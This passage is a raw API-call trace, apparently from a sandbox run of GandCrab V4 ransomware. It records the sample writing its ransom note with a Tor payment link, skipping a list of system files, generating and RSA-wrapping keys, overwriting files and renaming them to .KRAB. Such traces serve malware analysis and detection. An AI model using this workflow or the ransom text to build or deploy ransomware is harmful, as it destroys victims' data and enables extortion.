lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0084.069] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0084.069] WriteFile (in: hFile=0x420, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338d920, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338d920*=0x1f6e, lpOverlapped=0x0) returned 1 [0084.070] CloseHandle (hObject=0x420) returned 1 [0084.070] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.071] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.071] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1f, wMilliseconds=0x114)) [0084.071] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.071] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0084.072] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0084.072] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\d2ca4a08d2ca4dee3d.lock") returned 170 [0084.072] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x420 [0084.074] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.074] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.074] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\") returned 147 [0084.074] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*" [0084.074] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*", lpFindFileData=0x338d950 | out: lpFindFileData=0x338d950) returned 0x1022ff8 [0084.074] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.074] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338d950 | out: lpFindFileData=0x338d950) returned 1 [0084.075] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.075] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.075] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338d950 | out: lpFindFileData=0x338d950) returned 1 [0084.075] lstrcmpW (lpString1="1", lpString2=".") returned 1 [0084.075] lstrcmpW (lpString1="1", lpString2="..") returned 1 [0084.075] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\", lpString2="1" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1" [0084.075] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.075] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1.KRAB") returned 153 [0084.075] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1") returned 148 [0084.075] lstrlenW (lpString=".files\\1") returned 8 [0084.075] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.076] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".files\\1 ") returned 9 [0084.076] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.076] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1") returned 148 [0084.076] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1") returned 148 [0084.076] lstrcmpiW (lpString1="1", lpString2="desktop.ini") returned -1 [0084.076] lstrcmpiW (lpString1="1", lpString2="autorun.inf") returned -1 [0084.076] lstrcmpiW (lpString1="1", lpString2="ntuser.dat") returned -1 [0084.076] lstrcmpiW (lpString1="1", lpString2="iconcache.db") returned -1 [0084.076] lstrcmpiW (lpString1="1", lpString2="bootsect.bak") returned -1 [0084.076] lstrcmpiW (lpString1="1", lpString2="boot.ini") returned -1 [0084.076] lstrcmpiW (lpString1="1", lpString2="ntuser.dat.log") returned -1 [0084.076] lstrcmpiW (lpString1="1", lpString2="thumbs.db") returned -1 [0084.076] lstrcmpiW (lpString1="1", lpString2="KRAB-DECRYPT.html") returned -1 [0084.076] lstrcmpiW (lpString1="1", lpString2="KRAB-DECRYPT.txt") returned -1 [0084.076] lstrcmpiW (lpString1="1", lpString2="CRAB-DECRYPT.txt") returned -1 [0084.077] lstrcmpiW (lpString1="1", lpString2="ntldr") returned -1 [0084.077] lstrcmpiW (lpString1="1", lpString2="NTDETECT.COM") returned -1 [0084.077] lstrcmpiW (lpString1="1", lpString2="Bootfont.bin") returned -1 [0084.077] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.077] CryptAcquireContextW (in: phProv=0x338d834, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338d834*=0x10111b0) returned 1 [0084.079] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0084.080] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0084.081] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0084.081] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x20, pbBuffer=0x338d8cc | out: pbBuffer=0x338d8cc) returned 1 [0084.081] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0084.081] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.081] CryptAcquireContextW (in: phProv=0x338d834, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338d834*=0x10108a8) returned 1 [0084.100] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0084.101] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0084.101] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0084.101] CryptGenRandom (in: hProv=0x10108a8, dwLen=0x8, pbBuffer=0x338d8ec | out: pbBuffer=0x338d8ec) returned 1 [0084.102] CryptReleaseContext (hProv=0x10108a8, dwFlags=0x0) returned 1 [0084.102] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.102] CryptAcquireContextW (in: phProv=0x338d82c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338d82c*=0x1010bd8) returned 1 [0084.103] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338d830 | out: phKey=0x338d830*=0x1023838) returned 1 [0084.103] CryptGetKeyParam (in: hKey=0x1023838, dwParam=0x8, pbData=0x338d824, pdwDataLen=0x338d828, dwFlags=0x0 | out: pbData=0x338d824*=0x800, pdwDataLen=0x338d828*=0x4) returned 1 [0084.104] CryptEncrypt (in: hKey=0x1023838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338d85c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338d85c*=0x100) returned 1 [0084.104] GetLastError () returned 0x0 [0084.104] CryptDestroyKey (hKey=0x1023838) returned 1 [0084.104] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0084.104] CryptAcquireContextW (in: phProv=0x338d82c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338d82c*=0x1010ce8) returned 1 [0084.106] CryptImportKey (in: hProv=0x1010ce8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338d830 | out: phKey=0x338d830*=0x1023838) returned 1 [0084.106] CryptGetKeyParam (in: hKey=0x1023838, dwParam=0x8, pbData=0x338d824, pdwDataLen=0x338d828, dwFlags=0x0 | out: pbData=0x338d824*=0x800, pdwDataLen=0x338d828*=0x4) returned 1 [0084.106] CryptEncrypt (in: hKey=0x1023838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338d85c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338d85c*=0x100) returned 1 [0084.106] GetLastError () returned 0x0 [0084.106] CryptDestroyKey (hKey=0x1023838) returned 1 [0084.106] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0084.106] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x74c [0084.108] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0084.109] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0084.109] ReadFile (in: hFile=0x74c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338d8fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338d8fc*=0x81229, lpOverlapped=0x0) returned 1 [0084.217] SetFilePointerEx (in: hFile=0x74c, liDistanceToMove=0xfff7edd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.222] WriteFile (in: hFile=0x74c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x81229, lpNumberOfBytesWritten=0x338d8f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338d8f8*=0x81229, lpOverlapped=0x0) returned 1 [0084.223] WriteFile (in: hFile=0x74c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338d8f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338d8f8*=0x208, lpOverlapped=0x0) returned 1 [0084.223] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.228] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.230] CloseHandle (hObject=0x74c) returned 1 [0084.230] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.231] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1.krab")) returned 1 [0084.232] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.232] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338d950 | out: lpFindFileData=0x338d950) returned 1 [0084.232] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0084.232] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0084.232] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\d2ca4a08d2ca4dee3d.lock" [0084.232] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.233] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 175 [0084.233] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\d2ca4a08d2ca4dee3d.lock") returned 170 [0084.233] lstrlenW (lpString=".lock") returned 5 [0084.233] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.233] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0084.233] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.234] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.237] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338d950 | out: lpFindFileData=0x338d950) returned 1 [0084.237] lstrcmpW (lpString1="journals", lpString2=".") returned 1 [0084.237] lstrcmpW (lpString1="journals", lpString2="..") returned 1 [0084.237] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\", lpString2="journals" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals" [0084.237] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\" [0084.237] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0084.237] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0084.238] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0084.238] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0084.238] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0084.238] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.238] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.239] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\\\KRAB-DECRYPT.txt") returned 173 [0084.239] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x74c [0084.329] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB 